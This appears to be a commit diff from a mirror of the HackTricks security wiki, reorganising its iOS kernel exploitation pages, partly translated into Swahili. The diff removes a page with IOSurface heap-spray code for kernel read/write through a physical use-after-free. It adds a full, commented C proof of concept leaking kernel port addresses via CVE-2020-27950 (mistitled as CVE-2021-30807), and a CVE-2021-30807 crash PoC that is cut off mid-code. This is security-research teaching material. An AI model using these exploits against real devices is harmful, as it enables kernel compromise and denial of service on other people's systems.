maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/pentesting-web/wordpress.md

Browse Source
This commit is contained in:
Translator 2025-09-26 01:12:32 +00:00
parent 3ccbb9fa77
commit efa111760f
26 changed files with 3153 additions and 1782 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
src/SUMMARY.md
View File

@ -768,7 +768,7 @@
- [Stack Shellcode - arm64](binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md)
- [Stack Pivoting - EBP2Ret - EBP chaining](binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md)
- [Uninitialized Variables](binary-exploitation/stack-overflow/uninitialized-variables.md)
- [ROP - Return Oriented Programing](binary-exploitation/rop-return-oriented-programing/README.md)
- [ROP and JOP](binary-exploitation/rop-return-oriented-programing/README.md)
- [BROP - Blind Return Oriented Programming](binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md)
- [Ret2csu](binary-exploitation/rop-return-oriented-programing/ret2csu.md)
- [Ret2dlresolve](binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md)
@ -838,7 +838,7 @@
- [WWW2Exec - \_\_malloc_hook & \_\_free_hook](binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md)
- [Common Exploiting Problems](binary-exploitation/common-exploiting-problems.md)
- [Windows Exploiting (Basic Guide - OSCP lvl)](binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
- [iOS Exploiting](binary-exploitation/ios-exploiting.md)
- [iOS Exploiting](binary-exploitation/ios-exploiting/README.md)
# 🤖 AI
- [AI Security](AI/README.md)

207
src/binary-exploitation/ios-exploiting.md
View File

@ -1,207 +0,0 @@
# iOS Exploiting
{{#include ../banners/hacktricks-training.md}}
## Physical use-after-free
Hii ni muhtasari kutoka kwa chapisho kutoka [https://alfiecg.uk/2024/09/24/Kernel-exploit.html](https://alfiecg.uk/2024/09/24/Kernel-exploit.html) zaidi ya hayo, taarifa zaidi kuhusu exploit inayotumia mbinu hii inaweza kupatikana katika [https://github.com/felix-pb/kfd](https://github.com/felix-pb/kfd)
### Memory management in XNU <a href="#memory-management-in-xnu" id="memory-management-in-xnu"></a>
**Anwani ya nafasi ya kumbukumbu ya virtual** kwa michakato ya mtumiaji kwenye iOS inapanuka kutoka **0x0 hadi 0x8000000000**. Hata hivyo, anwani hizi hazihusiani moja kwa moja na kumbukumbu halisi. Badala yake, **kernel** hutumia **meza za kurasa** kutafsiri anwani za virtual kuwa anwani halisi za **kumbukumbu**.
#### Levels of Page Tables in iOS
Meza za kurasa zimeandaliwa kwa njia ya ngazi tatu:
1. **L1 Page Table (Ngazi ya 1)**:
* Kila kipengee hapa kinawakilisha anuwai kubwa ya kumbukumbu ya virtual.
* Inashughulikia **0x1000000000 bytes** (au **256 GB**) ya kumbukumbu ya virtual.
2. **L2 Page Table (Ngazi ya 2)**:
* Kipengee hapa kinawakilisha eneo dogo la kumbukumbu ya virtual, haswa **0x2000000 bytes** (32 MB).
* Kipengee cha L1 kinaweza kuelekeza kwenye meza ya L2 ikiwa hakiwezi kuunganisha eneo lote lenyewe.
3. **L3 Page Table (Ngazi ya 3)**:
* Hii ndiyo ngazi ya chini zaidi, ambapo kila kipengee kinaunganisha ukurasa mmoja wa kumbukumbu wa **4 KB**.
* Kipengee cha L2 kinaweza kuelekeza kwenye meza ya L3 ikiwa udhibiti wa kina unahitajika.
#### Mapping Virtual to Physical Memory
* **Direct Mapping (Block Mapping)**:
* Baadhi ya vipengee katika meza ya kurasa moja kwa moja **huunganisha anuwai ya anwani za virtual** na anuwai inayoendelea ya anwani halisi (kama njia fupi).
* **Pointer to Child Page Table**:
* Ikiwa udhibiti wa kina unahitajika, kipengee katika ngazi moja (mfano, L1) kinaweza kuelekeza kwenye **meza ya kurasa ya mtoto** katika ngazi inayofuata (mfano, L2).
#### Example: Mapping a Virtual Address
Hebu tuseme unajaribu kufikia anwani ya virtual **0x1000000000**:
1. **L1 Table**:
* Kernel inakagua kipengee cha meza ya L1 kinachohusiana na anwani hii ya virtual. Ikiwa ina **pointer kwa meza ya L2**, inaenda kwenye meza hiyo ya L2.
2. **L2 Table**:
* Kernel inakagua meza ya L2 kwa ramani ya kina zaidi. Ikiwa kipengee hiki kinaelekeza kwenye **meza ya L3**, inaendelea huko.
3. **L3 Table**:
* Kernel inatafuta kipengee cha mwisho cha L3, ambacho kinaelekeza kwenye **anwani halisi** ya ukurasa halisi wa kumbukumbu.
#### Example of Address Mapping
Ikiwa unaandika anwani halisi **0x800004000** kwenye index ya kwanza ya meza ya L2, basi:
* Anwani za virtual kutoka **0x1000000000** hadi **0x1002000000** zinaunganisha na anwani halisi kutoka **0x800004000** hadi **0x802004000**.
* Hii ni **block mapping** katika ngazi ya L2.
Vinginevyo, ikiwa kipengee cha L2 kinaelekeza kwenye meza ya L3:
* Kila ukurasa wa 4 KB katika anuwai ya anwani ya virtual **0x1000000000 -> 0x1002000000** utakuwa umeunganishwa na vipengee vya kibinafsi katika meza ya L3.
### Physical use-after-free
**Physical use-after-free** (UAF) hutokea wakati:
1. Mchakato **unapotoa** kumbukumbu fulani kama **inasomeka na kuandikwa**.
2. **Meza za kurasa** zinasasishwa ili kuunganisha kumbukumbu hii na anwani halisi maalum ambayo mchakato unaweza kufikia.
3. Mchakato **unafuta** (huru) kumbukumbu hiyo.
4. Hata hivyo, kutokana na **hitilafu**, kernel **inasahau kuondoa uhusiano** kutoka kwa meza za kurasa, ingawa inashiriki kumbukumbu halisi inayohusiana kama huru.
5. Kernel inaweza kisha **kutoa tena kumbukumbu halisi "iliyohifadhiwa"** kwa madhumuni mengine, kama **data ya kernel**.
6. Kwa kuwa uhusiano haukuondolewa, mchakato bado unaweza **kusoma na kuandika** kwenye kumbukumbu halisi hii.
Hii inamaanisha mchakato unaweza kufikia **kurasa za kumbukumbu ya kernel**, ambazo zinaweza kuwa na data au muundo wa nyeti, na hivyo kumruhusu mshambuliaji **kubadilisha kumbukumbu ya kernel**.
### Exploitation Strategy: Heap Spray
Kwa kuwa mshambuliaji hawezi kudhibiti ni kurasa zipi maalum za kernel zitakazotolewa kwa kumbukumbu iliyohifadhiwa, wanatumia mbinu inayoitwa **heap spray**:
1. Mshambuliaji **anaunda idadi kubwa ya vitu vya IOSurface** katika kumbukumbu ya kernel.
2. Kila kitu cha IOSurface kina **thamani ya kichawi** katika moja ya maeneo yake, ikifanya iwe rahisi kutambua.
3. Wanachunguza **kurasa zilizohifadhiwa** kuona ikiwa yoyote ya vitu hivi imeanguka kwenye ukurasa uliohifadhiwa.
4. Wanapokutana na kitu cha IOSurface kwenye ukurasa uliohifadhiwa, wanaweza kukitumia **kusoma na kuandika kumbukumbu ya kernel**.
Taarifa zaidi kuhusu hii katika [https://github.com/felix-pb/kfd/tree/main/writeups](https://github.com/felix-pb/kfd/tree/main/writeups)
### Step-by-Step Heap Spray Process
1. **Spray IOSurface Objects**: Mshambuliaji anaunda vitu vingi vya IOSurface vyenye kitambulisho maalum ("thamani ya kichawi").
2. **Scan Freed Pages**: Wanakagua ikiwa yoyote ya vitu imewekwa kwenye ukurasa uliohifadhiwa.
3. **Read/Write Kernel Memory**: Kwa kubadilisha maeneo katika kitu cha IOSurface, wanapata uwezo wa kufanya **kusoma na kuandika bila mipaka** katika kumbukumbu ya kernel. Hii inawaruhusu:
* Kutumia eneo moja kusoma **thamani yoyote ya 32-bit** katika kumbukumbu ya kernel.
* Kutumia eneo lingine kuandika **thamani za 64-bit**, na kufikia **primitive ya kusoma/kuandika ya kernel** thabiti.
Unda vitu vya IOSurface vyenye thamani ya kichawi IOSURFACE\_MAGIC ili baadaye kutafuta:
```c
void spray_iosurface(io_connect_t client, int nSurfaces, io_connect_t **clients, int *nClients) {
if (*nClients >= 0x4000) return;
for (int i = 0; i < nSurfaces; i++) {
fast_create_args_t args;
lock_result_t result;
size_t size = IOSurfaceLockResultSize;
args.address = 0;
args.alloc_size = *nClients + 1;
args.pixel_format = IOSURFACE_MAGIC;
IOConnectCallMethod(client, 6, 0, 0, &args, 0x20, 0, 0, &result, &size);
io_connect_t id = result.surface_id;
(*clients)[*nClients] = id;
*nClients = (*nClients) += 1;
}
}
```
Tafuta **`IOSurface`** vitu katika ukurasa mmoja wa kimwili ulioachiliwa:
```c
int iosurface_krw(io_connect_t client, uint64_t *puafPages, int nPages, uint64_t *self_task, uint64_t *puafPage) {
io_connect_t *surfaceIDs = malloc(sizeof(io_connect_t) * 0x4000);
int nSurfaceIDs = 0;
for (int i = 0; i < 0x400; i++) {
spray_iosurface(client, 10, &surfaceIDs, &nSurfaceIDs);
for (int j = 0; j < nPages; j++) {
uint64_t start = puafPages[j];
uint64_t stop = start + (pages(1) / 16);
for (uint64_t k = start; k < stop; k += 8) {
if (iosurface_get_pixel_format(k) == IOSURFACE_MAGIC) {
info.object = k;
info.surface = surfaceIDs[iosurface_get_alloc_size(k) - 1];
if (self_task) *self_task = iosurface_get_receiver(k);
goto sprayDone;
}
}
}
}
sprayDone:
for (int i = 0; i < nSurfaceIDs; i++) {
if (surfaceIDs[i] == info.surface) continue;
iosurface_release(client, surfaceIDs[i]);
}
free(surfaceIDs);
return 0;
}
```
### Kufikia Kernel Read/Write na IOSurface
Baada ya kupata udhibiti wa kitu cha IOSurface katika kumbukumbu ya kernel (kilichopangwa kwenye ukurasa wa kimwili ulioachwa unaoweza kufikiwa kutoka kwa nafasi ya mtumiaji), tunaweza kukitumia kwa **operesheni za kusoma na kuandika za kernel zisizo na mipaka**.
**Sehemu Muhimu katika IOSurface**
Kitu cha IOSurface kina sehemu mbili muhimu:
1. **Pointer ya Hesabu ya Matumizi**: Inaruhusu **kusoma 32-bit**.
2. **Pointer ya Wakati wa Kijalala**: Inaruhusu **kuandika 64-bit**.
Kwa kubadilisha pointers hizi, tunaelekeza kwenye anwani zisizo na mipaka katika kumbukumbu ya kernel, na kuwezesha uwezo wa kusoma/kuandika.
#### Kernel Read ya 32-Bit
Ili kufanya kusoma:
1. Badilisha **pointer ya hesabu ya matumizi** ili kuelekeza kwenye anwani ya lengo minus offset ya 0x14-byte.
2. Tumia njia ya `get_use_count` kusoma thamani katika anwani hiyo.
```c
uint32_t get_use_count(io_connect_t client, uint32_t surfaceID) {
uint64_t args[1] = {surfaceID};
uint32_t size = 1;
uint64_t out = 0;
IOConnectCallMethod(client, 16, args, 1, 0, 0, &out, &size, 0, 0);
return (uint32_t)out;
}
uint32_t iosurface_kread32(uint64_t addr) {
uint64_t orig = iosurface_get_use_count_pointer(info.object);
iosurface_set_use_count_pointer(info.object, addr - 0x14); // Offset by 0x14
uint32_t value = get_use_count(info.client, info.surface);
iosurface_set_use_count_pointer(info.object, orig);
return value;
}
```
#### 64-Bit Kernel Write
Ili kufanya kuandika:
1. Badilisha **kiashiria cha muda kilichoorodheshwa** kwa anwani ya lengo.
2. Tumia njia ya `set_indexed_timestamp` kuandika thamani ya 64-bit.
```c
void set_indexed_timestamp(io_connect_t client, uint32_t surfaceID, uint64_t value) {
uint64_t args[3] = {surfaceID, 0, value};
IOConnectCallMethod(client, 33, args, 3, 0, 0, 0, 0, 0, 0);
}
void iosurface_kwrite64(uint64_t addr, uint64_t value) {
uint64_t orig = iosurface_get_indexed_timestamp_pointer(info.object);
iosurface_set_indexed_timestamp_pointer(info.object, addr);
set_indexed_timestamp(info.client, info.surface, value);
iosurface_set_indexed_timestamp_pointer(info.object, orig);
}
```
#### Muhtasari wa Mchakato wa Ulaghai
1. **Chochea Matumizi Baada ya Kuachiliwa**: Kurasa zilizofunguliwa zinapatikana kwa matumizi tena.
2. **Sambaza Vitu vya IOSurface**: Panga vitu vingi vya IOSurface vyenye "thamani ya uchawi" ya kipekee katika kumbukumbu ya kernel.
3. **Tambua IOSurface Inayopatikana**: Pata IOSurface kwenye ukurasa ulioachiliwa ambao unadhibiti.
4. **Tumia Matumizi Baada ya Kuachiliwa**: Badilisha viashiria katika kitu cha IOSurface ili kuwezesha **kusoma/kandika** kwa njia isiyo na mipaka kupitia mbinu za IOSurface.
Kwa kutumia hizi mbinu, ulaghai unatoa **kusoma 32-bit** na **kandika 64-bit** kwa kumbukumbu ya kernel. Hatua zaidi za jailbreak zinaweza kujumuisha mbinu za kusoma/kandika zenye uthabiti zaidi, ambazo zinaweza kuhitaji kupita kinga za ziada (mfano, PPL kwenye vifaa vya arm64e vya kisasa).
{{#include ../banners/hacktricks-training.md}}

332
src/binary-exploitation/ios-exploiting/CVE-2020-27950-mach_msg_trailer_t.md Normal file
View File

@ -0,0 +1,332 @@
# CVE-2021-30807: IOMobileFrameBuffer OOB
{{#include ../../banners/hacktricks-training.md}}
## Hitilafu
You have a [great explanation of the vuln here](https://www.synacktiv.com/en/publications/ios-1-day-hunting-uncovering-and-exploiting-cve-2020-27950-kernel-memory-leak), lakini kwa muhtasari:
Kila ujumbe wa Mach unaoupokelewa na kernel unamalizika na **"trailer"**: struct ya urefu wa kubadilika yenye metadata (seqno, sender token, audit token, context, access control data, labels...). Kernel **hutoa nafasi kila mara kwa trailer kubwa zaidi inayowezekana** (MAX_TRAILER_SIZE) katika buffer ya ujumbe, lakini **huanzisha tu baadhi ya maeneo**, kisha baadaye **huamua ni ukubwa gani wa trailer kurudishwa** kwa msingi wa **chaguzi za kupokea zinazodhibitiwa na mtumiaji**.
Hizi ndizo structs zinazohusiana na trailer:
```c
typedef struct{
mach_msg_trailer_type_t msgh_trailer_type;
mach_msg_trailer_size_t msgh_trailer_size;
} mach_msg_trailer_t;
typedef struct{
mach_msg_trailer_type_t msgh_trailer_type;
mach_msg_trailer_size_t msgh_trailer_size;
mach_port_seqno_t msgh_seqno;
security_token_t msgh_sender;
audit_token_t msgh_audit;
mach_port_context_t msgh_context;
int msgh_ad;
msg_labels_t msgh_labels;
} mach_msg_mac_trailer_t;
#define MACH_MSG_TRAILER_MINIMUM_SIZE sizeof(mach_msg_trailer_t)
typedef mach_msg_mac_trailer_t mach_msg_max_trailer_t;
#define MAX_TRAILER_SIZE ((mach_msg_size_t)sizeof(mach_msg_max_trailer_t))
```
Kisha, wakati trailer object inapotengenezwa, tu baadhi ya fields zimeanzishwa, na max trailer size daima imetengwa:
```c
trailer = (mach_msg_max_trailer_t *) ((vm_offset_t)kmsg->ikm_header + size);
trailer->msgh_sender = current_thread()->task->sec_token;
trailer->msgh_audit = current_thread()->task->audit_token;
trailer->msgh_trailer_type = MACH_MSG_TRAILER_FORMAT_0;
trailer->msgh_trailer_size = MACH_MSG_TRAILER_MINIMUM_SIZE;
[...]
trailer->msgh_labels.sender = 0;
```
Kisha, kwa mfano, unapojaribu kusoma mach message ukitumia `mach_msg()`, kazi `ipc_kmsg_add_trailer()` inaitwa ili kuongeza trailer kwenye ujumbe. Ndani ya kazi hii, ukubwa wa trailer unahesabiwa na baadhi ya viwanja vingine vya trailer hujazwa:
```c
if (!(option & MACH_RCV_TRAILER_MASK)) { [3]
return trailer->msgh_trailer_size;
}
trailer->msgh_seqno = seqno;
trailer->msgh_context = context;
trailer->msgh_trailer_size = REQUESTED_TRAILER_SIZE(thread_is_64bit_addr(thread), option);
```
Kigezo cha `option` kinadhibitiwa na mtumiaji, kwa hivyo **inahitajika kupeleka thamani inayopita ukaguzi wa `if`.**
Ili kupitisha ukaguzi huu tunahitaji kutuma `option` halali inayoungwa mkono:
```c
#define MACH_RCV_TRAILER_NULL 0
#define MACH_RCV_TRAILER_SEQNO 1
#define MACH_RCV_TRAILER_SENDER 2
#define MACH_RCV_TRAILER_AUDIT 3
#define MACH_RCV_TRAILER_CTX 4
#define MACH_RCV_TRAILER_AV 7
#define MACH_RCV_TRAILER_LABELS 8
#define MACH_RCV_TRAILER_TYPE(x) (((x) & 0xf) << 28)
#define MACH_RCV_TRAILER_ELEMENTS(x) (((x) & 0xf) << 24)
#define MACH_RCV_TRAILER_MASK ((0xf << 24))
```
Lakini, kwa sababu `MACH_RCV_TRAILER_MASK` inachunguza tu bits, tunaweza kupitisha thamani yoyote kati ya `0` na `8` ili kutoingia ndani ya kauli ya `if`.
Kisha, ukiendelea na msimbo utaona:
```c
if (GET_RCV_ELEMENTS(option) >= MACH_RCV_TRAILER_AV) {
trailer->msgh_ad = 0;
}
/*
* The ipc_kmsg_t holds a reference to the label of a label
* handle, not the port. We must get a reference to the port
* and a send right to copyout to the receiver.
*/
if (option & MACH_RCV_TRAILER_ELEMENTS(MACH_RCV_TRAILER_LABELS)) {
trailer->msgh_labels.sender = 0;
}
done:
#ifdef __arm64__
ipc_kmsg_munge_trailer(trailer, real_trailer_out, thread_is_64bit_addr(thread));
#endif /* __arm64__ */
return trailer->msgh_trailer_size;
```
Hapa unaweza kuona kwamba ikiwa `option` ni kubwa au sawa na `MACH_RCV_TRAILER_AV` (7), uwanja **`msgh_ad`** umeanzishwa kwa `0`.
Kama ulivyogundua, **`msgh_ad`** bado ilikuwa uwanja pekee wa trailer ambao haukuanzishwa hapo awali na unaweza kuwa na leak kutoka kwa memory iliyotumika hapo awali.
Hivyo, njia ya kuepuka kuianzisha ni kupitisha thamani ya `option` kuwa `5` au `6`, hivyo itaenda kupitia ukaguzi wa kwanza wa `if` na haitajiingia kwenye `if` inayoiweka `msgh_ad` kwa sababu thamani `5` na `6` hazina aina yoyote ya trailer iliyohusishwa.
### Basic PoC
Inside the [original post](https://www.synacktiv.com/en/publications/ios-1-day-hunting-uncovering-and-exploiting-cve-2020-27950-kernel-memory-leak), you have a PoC to just leak some random data.
### Leak Kernel Address PoC
Inside the [original post](https://www.synacktiv.com/en/publications/ios-1-day-hunting-uncovering-and-exploiting-cve-2020-27950-kernel-memory-leak), kuna PoC ya ku-leak anwani ya kernel. Kwa hili, ujumbe uliojaa structs za `mach_msg_port_descriptor_t` unatumwa kwa sababu uwanja `name` wa muundo huu katika userland una unsigned int lakini katika kernel uwanja `name` ni pointer kwa struct `ipc_port`. Hivyo, kutuma kumi au zaidi ya structs hizi katika ujumbe wa kernel kutamaanisha **kuongeza anwani kadhaa za kernel ndani ya ujumbe** ili moja yao inaweza ku-leak.
Maelezo yaliongezwa kwa uelewa bora:
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <mach/mach.h>
// Number of OOL port descriptors in the "big" message.
// This layout aims to fit messages into kalloc.1024 (empirically good on impacted builds).
#define LEAK_PORTS 50
// "Big" message: many descriptors → larger descriptor array in kmsg
typedef struct {
mach_msg_header_t header;
mach_msg_body_t body;
mach_msg_port_descriptor_t sent_ports[LEAK_PORTS];
} message_big_t;
// "Small" message: fewer descriptors → leaves more room for the trailer
// to overlap where descriptor pointers used to be in the reused kalloc chunk.
typedef struct {
mach_msg_header_t header;
mach_msg_body_t body;
mach_msg_port_descriptor_t sent_ports[LEAK_PORTS - 10];
} message_small_t;
int main(int argc, char *argv[]) {
mach_port_t port; // our local receive port (target of sends)
mach_port_t sent_port; // the port whose kernel address we want to leak
/*
* 1) Create a receive right and attach a send right so we can send to ourselves.
* This gives us predictable control over ipc_kmsg allocations when we send.
*/
mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
/*
* 2) Create another receive port (sent_port). We'll reference this port
* in OOL descriptors so the kernel stores pointers to its ipc_port
* structure in the kmsg → those pointers are what we aim to leak.
*/
mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &sent_port);
mach_port_insert_right(mach_task_self(), sent_port, sent_port, MACH_MSG_TYPE_MAKE_SEND);
printf("[*] Will get port %x address\n", sent_port);
message_big_t *big_message = NULL;
message_small_t *small_message = NULL;
// Compute userland sizes of our message structs
mach_msg_size_t big_size = (mach_msg_size_t)sizeof(*big_message);
mach_msg_size_t small_size = (mach_msg_size_t)sizeof(*small_message);
// Allocate user buffers for the two send messages (+MAX_TRAILER_SIZE for safety/margin)
big_message = malloc(big_size + MAX_TRAILER_SIZE);
small_message = malloc(small_size + sizeof(uint32_t)*2 + MAX_TRAILER_SIZE);
/*
* 3) Prepare the "big" message:
* - Complex bit set (has descriptors)
* - 50 OOL port descriptors, all pointing to the same sent_port
* When you send a Mach message with port descriptors, the kernel “copy-ins” the userland port names (integers in your processs IPC space) into an in-kernel ipc_kmsg_t, and resolves each name to the actual kernel object (an ipc_port).
* Inside the kernel message, the header/descriptor area holds object pointers, not user names. On the way out (to the receiver), XNU “copy-outs” and converts those pointers back into names. This is explicitly documented in the copyout path: “the remote/local port fields contain port names instead of object pointers” (meaning they were pointers in-kernel).
*/
printf("[*] Creating first kalloc.1024 ipc_kmsg\n");
memset(big_message, 0, big_size + MAX_TRAILER_SIZE);
big_message->header.msgh_remote_port = port; // send to our receive right
big_message->header.msgh_size = big_size;
big_message->header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0)
| MACH_MSGH_BITS_COMPLEX;
big_message->body.msgh_descriptor_count = LEAK_PORTS;
for (int i = 0; i < LEAK_PORTS; i++) {
big_message->sent_ports[i].type = MACH_MSG_PORT_DESCRIPTOR;
big_message->sent_ports[i].disposition = MACH_MSG_TYPE_COPY_SEND;
big_message->sent_ports[i].name = sent_port; // repeated to fill array with pointers
}
/*
* 4) Prepare the "small" message:
* - Fewer descriptors (LEAK_PORTS-10) so that, when the kalloc.1024 chunk is reused,
* the trailer sits earlier and *overlaps* bytes where descriptor pointers lived.
*/
printf("[*] Creating second kalloc.1024 ipc_kmsg\n");
memset(small_message, 0, small_size + sizeof(uint32_t)*2 + MAX_TRAILER_SIZE);
small_message->header.msgh_remote_port = port;
small_message->header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0)
| MACH_MSGH_BITS_COMPLEX;
small_message->body.msgh_descriptor_count = LEAK_PORTS - 10;
for (int i = 0; i < LEAK_PORTS - 10; i++) {
small_message->sent_ports[i].type = MACH_MSG_PORT_DESCRIPTOR;
small_message->sent_ports[i].disposition = MACH_MSG_TYPE_COPY_SEND;
small_message->sent_ports[i].name = sent_port;
}
/*
* 5) Receive buffer for reading back messages with trailers.
* We'll request a *max-size* trailer via MACH_RCV_TRAILER_ELEMENTS(5).
* On vulnerable kernels, field `msgh_ad` (in mac trailer) may be left uninitialized
* if the requested elements value is < MACH_RCV_TRAILER_AV, causing stale bytes to leak.
*/
uint8_t *buffer = malloc(big_size + MAX_TRAILER_SIZE);
mach_msg_mac_trailer_t *trailer; // interpret the tail as a "mac trailer" (format 0 / 64-bit variant internally)
uintptr_t sent_port_address = 0; // we'll build the 64-bit pointer from two 4-byte leaks
/*
* ---------- Exploitation sequence ----------
*
* Step A: Send the "big" message → allocate a kalloc.1024 ipc_kmsg that contains many
* kernel pointers (ipc_port*) in its descriptor array.
*/
printf("[*] Sending message 1\n");
mach_msg(&big_message->header,
MACH_SEND_MSG,
big_size, // send size
0, // no receive
MACH_PORT_NULL,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
/*
* Step B: Immediately receive/discard it with a zero-sized buffer.
* This frees the kalloc chunk without copying descriptors back,
* leaving the kernel pointers resident in freed memory (stale).
*/
printf("[*] Discarding message 1\n");
mach_msg((mach_msg_header_t *)0,
MACH_RCV_MSG, // try to receive
0, // send size 0
0, // recv size 0 (forces error/free path)
port,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
/*
* Step C: Reuse the same size-class with the "small" message (fewer descriptors).
* We slightly bump msgh_size by +4 so that when the kernel appends
* the trailer, the trailer's uninitialized field `msgh_ad` overlaps
* the low 4 bytes of a stale ipc_port* pointer from the prior message.
*/
small_message->header.msgh_size = small_size + sizeof(uint32_t); // +4 to shift overlap window
printf("[*] Sending message 2\n");
mach_msg(&small_message->header,
MACH_SEND_MSG,
small_size + sizeof(uint32_t),
0,
MACH_PORT_NULL,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
/*
* Step D: Receive message 2 and request an invalid trailer elements value (5).
* - Bits 24..27 (MACH_RCV_TRAILER_MASK) are nonzero → the kernel computes a trailer.
* - Elements=5 doesn't match any valid enum → REQUESTED_TRAILER_SIZE(...) falls back to max size.
* - BUT init of certain fields (like `ad`) is guarded by >= MACH_RCV_TRAILER_AV (7),
* so with 5, `msgh_ad` remains uninitialized → stale bytes leak.
*/
memset(buffer, 0, big_size + MAX_TRAILER_SIZE);
printf("[*] Reading back message 2\n");
mach_msg((mach_msg_header_t *)buffer,
MACH_RCV_MSG | MACH_RCV_TRAILER_ELEMENTS(5), // core of CVE-2020-27950
0,
small_size + sizeof(uint32_t) + MAX_TRAILER_SIZE, // ensure room for max trailer
port,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
// Trailer begins right after the message body we sent (small_size + 4)
trailer = (mach_msg_mac_trailer_t *)(buffer + small_size + sizeof(uint32_t));
// Leak low 32 bits from msgh_ad (stale data → expected to be the low dword of an ipc_port*)
sent_port_address |= (uint32_t)trailer->msgh_ad;
/*
* Step E: Repeat the A→D cycle but now shift by another +4 bytes.
* This moves the overlap window so `msgh_ad` captures the high 4 bytes.
*/
printf("[*] Sending message 3\n");
mach_msg(&big_message->header, MACH_SEND_MSG, big_size, 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
printf("[*] Discarding message 3\n");
mach_msg((mach_msg_header_t *)0, MACH_RCV_MSG, 0, 0, port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
// add another +4 to msgh_size → total +8 shift from the baseline
small_message->header.msgh_size = small_size + sizeof(uint32_t)*2;
printf("[*] Sending message 4\n");
mach_msg(&small_message->header,
MACH_SEND_MSG,
small_size + sizeof(uint32_t)*2,
0,
MACH_PORT_NULL,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
memset(buffer, 0, big_size + MAX_TRAILER_SIZE);
printf("[*] Reading back message 4\n");
mach_msg((mach_msg_header_t *)buffer,
MACH_RCV_MSG | MACH_RCV_TRAILER_ELEMENTS(5),
0,
small_size + sizeof(uint32_t)*2 + MAX_TRAILER_SIZE,
port,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
trailer = (mach_msg_mac_trailer_t *)(buffer + small_size + sizeof(uint32_t)*2);
// Combine the high 32 bits, reconstructing the full 64-bit kernel pointer
sent_port_address |= ((uintptr_t)trailer->msgh_ad) << 32;
printf("[+] Port %x has address %lX\n", sent_port, sent_port_address);
return 0;
}
```
## Marejeo
- [Synacktiv's blog post](https://www.synacktiv.com/en/publications/ios-1-day-hunting-uncovering-and-exploiting-cve-2020-27950-kernel-memory-leak)
{{#include ../../banners/hacktricks-training.md}}

297
src/binary-exploitation/ios-exploiting/CVE-2021-30807-IOMobileFrameBuffer.md Normal file
View File

@ -0,0 +1,297 @@
# CVE-2021-30807: IOMobileFrameBuffer OOB
{{#include ../../banners/hacktricks-training.md}}
## Hitilafu
Una [maelezo mazuri ya udhaifu hapa](https://saaramar.github.io/IOMobileFrameBuffer_LPE_POC/), lakini kwa muhtasari:
- The vulnerable code path is **external method #83** of the **IOMobileFramebuffer / AppleCLCD** user client: `IOMobileFramebufferUserClient::s_displayed_fb_surface(...)`. Hii method inapata kigezo kinachodhibitiwa na mtumiaji ambacho hakikaguliwi kwa namna yoyote na kinapitia kwa function inayofuata kama **`scalar0`**.
- That method forwards into **`IOMobileFramebufferLegacy::get_displayed_surface(this, task*, out_id, scalar0)`**, where **`scalar0`** (thamani ya **32-bit** inayodhibitiwa na mtumiaji) is used as an **index** into an internal **array of pointers** without **any bounds check**:
> `ptr = *(this + 0xA58 + scalar0 * 8);` → passed to `IOSurfaceRoot::copyPortNameForSurfaceInTask(...)` as an **`IOSurface*`**.\
> **Matokeo:** **OOB pointer read & type confusion** on that array. If the pointer isn't valid, the kernel deref panics → **DoS**.
> [!NOTE]
> This was fixed in **iOS/iPadOS 14.7.1**, **macOS Big Sur 11.5.1**, **watchOS 7.6.1**
> [!WARNING]
> The initial function to call `IOMobileFramebufferUserClient::s_displayed_fb_surface(...)` is protected by the entitlement **`com.apple.private.allow-explicit-graphics-priority`**. However, **WebKit.WebContent** has this entitlement, so it can be used to trigger the vuln from a sandboxed process.
## DoS PoC
The following is the initial DoS PoC from the ooriginal blog post with extra comments:
```c
// PoC for CVE-2021-30807 trigger (annotated)
// NOTE: This demonstrates the crash trigger; it is NOT an LPE.
// Build/run only on devices you own and that are vulnerable.
// Patched in iOS/iPadOS 14.7.1, macOS 11.5.1, watchOS 7.6.1. (Apple advisory)
// https://support.apple.com/en-us/103144
// https://nvd.nist.gov/vuln/detail/CVE-2021-30807
void trigger_clcd_vuln(void) {
kern_return_t ret;
io_connect_t shared_user_client_conn = MACH_PORT_NULL;
// The "type" argument is the type (selector) of user client to open.
// For IOMobileFramebuffer, 2 typically maps to a user client that exposes the
// external methods we need (incl. selector 83). If this doesn't work on your
// build, try different types or query IORegistry to enumerate.
int type = 2;
// 1) Locate the IOMobileFramebuffer service in the IORegistry.
// This returns the first matched service object (a kernel object handle).
io_service_t service = IOServiceGetMatchingService(
kIOMasterPortDefault,
IOServiceMatching("IOMobileFramebuffer"));
if (service == MACH_PORT_NULL) {
printf("failed to open service\n");
return;
}
printf("service: 0x%x\n", service);
// 2) Open a connection (user client) to the service.
// The user client is what exposes external methods to userland.
// 'type' selects which user client class/variant to instantiate.
ret = IOServiceOpen(service, mach_task_self(), type, &shared_user_client_conn);
if (ret != KERN_SUCCESS) {
printf("failed to open userclient: %s\n", mach_error_string(ret));
return;
}
printf("client: 0x%x\n", shared_user_client_conn);
printf("call externalMethod\n");
